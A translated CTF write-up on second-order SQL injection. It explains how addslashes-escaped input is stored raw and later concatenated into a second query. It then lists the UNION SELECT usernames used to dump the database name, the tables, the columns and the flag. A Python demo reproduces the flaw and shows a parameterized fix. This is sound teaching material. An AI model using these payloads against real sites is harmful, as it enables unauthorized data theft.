October 2019 Twice SQL Injection
2022-08-03 22:04:00 【New Reading of the Classic of Tea.】
The title hints that this is a secondary (second-order) injection (see "SQL injection (secondary injection) - Zhihu"); secondary injection is a widespread class of security vulnerability in web applications.
The principle of secondary injection:
When data is inserted into the database for the first time, the application only escapes special characters with addslashes (or relies on get_magic_quotes_gpc). addslashes prepends a "\" to each quote so that the INSERT itself is safe, but the backslash is only an escape for that statement: it is not stored, and the database keeps the original, unescaped value.
Once the data is in the database, the developer treats it as trusted. When it is later read back and used in another query, the "dirty" value is taken straight from the database without further checking or escaping and spliced into the SQL string, which produces a secondary SQL injection. For example, if the data inserted the first time contains a single quotation mark and is stored as-is, the quote becomes live the next time that value is concatenated into a query, and the injection happens there.
Register an arbitrary account, log in, enter an SQL statement, and observe that the server escapes our single quotes with \ and does not filter keywords.
So we need to register a malicious username and log in with it to get the information we want.
The registered username is 1' union select database() #, the password is a.
Return to the login page and enter the username (1' union select database() #) and password (a).
After logging in, the database name ctftraining is exposed.
Use the same method to enumerate the tables: username 1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #, password a; register and log in, and we get three tables: flag, news, users.
Check the columns of the flag table: username 1' union select group_concat(column_name) from information_schema.columns where table_name='flag' #, password a; register and log in the same way.
We get the flag column.
Read the contents of the flag column: username 1' union select flag from flag #, password a.
We get the flag.
That's all; time to celebrate.
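The register/login flow above, reproduced as an added Python example (not code from the original post or from the challenge): the first two queries escape the username, the "profile" query trusts the stored value and concatenates it, and a parameterized version shows the fix. It uses SQLite in memory, so quotes are doubled instead of backslash-escaped and `--` stands in for MySQL's `#`; the table and flag value are constructed samples.

```python
import sqlite3

# Constructed payload in the style of the writeup; "-- " is SQLite's line comment.
PAYLOAD = "1' union select flag from flag -- "


def escape_quotes(s: str) -> str:
    """Escape a value for inlining into an SQL string literal.
    addslashes() would add a backslash for MySQL; SQLite doubles the quote.
    Either way the database stores the ORIGINAL quote, not the escape."""
    return s.replace("'", "''")


def setup() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE users(username TEXT, password TEXT);"
        "CREATE TABLE flag(flag TEXT);"
        "INSERT INTO flag VALUES ('flag{constructed_sample}');"
    )
    return con


def register(con, username, password):
    # First query: escaped, so the quote in the username cannot break out here.
    con.execute(f"INSERT INTO users VALUES ('{escape_quotes(username)}', "
                f"'{escape_quotes(password)}')")


def login(con, username, password):
    # Also escaped. Returns the username exactly as the database stored it.
    row = con.execute(f"SELECT username FROM users WHERE username='{escape_quotes(username)}' "
                      f"AND password='{escape_quotes(password)}'").fetchone()
    return row[0] if row else None


def profile_vulnerable(con, stored_username):
    # Second query: the value came from the database, so it is "trusted" and
    # concatenated. The stored quote is live again: secondary injection.
    sql = f"SELECT username FROM users WHERE username='{stored_username}'"
    return [r[0] for r in con.execute(sql)]


def profile_safe(con, stored_username):
    # Bind the value instead; where the data came from no longer matters.
    return [r[0] for r in con.execute(
        "SELECT username FROM users WHERE username=?", (stored_username,))]


def demo():
    con = setup()
    register(con, PAYLOAD, "a")
    name = login(con, PAYLOAD, "a")  # comes back as the raw payload
    return name, profile_vulnerable(con, name), profile_safe(con, name)
```

`demo()` returns the stored username, the rows the concatenating query leaks (the flag) and the rows the bound query returns (only the literal username).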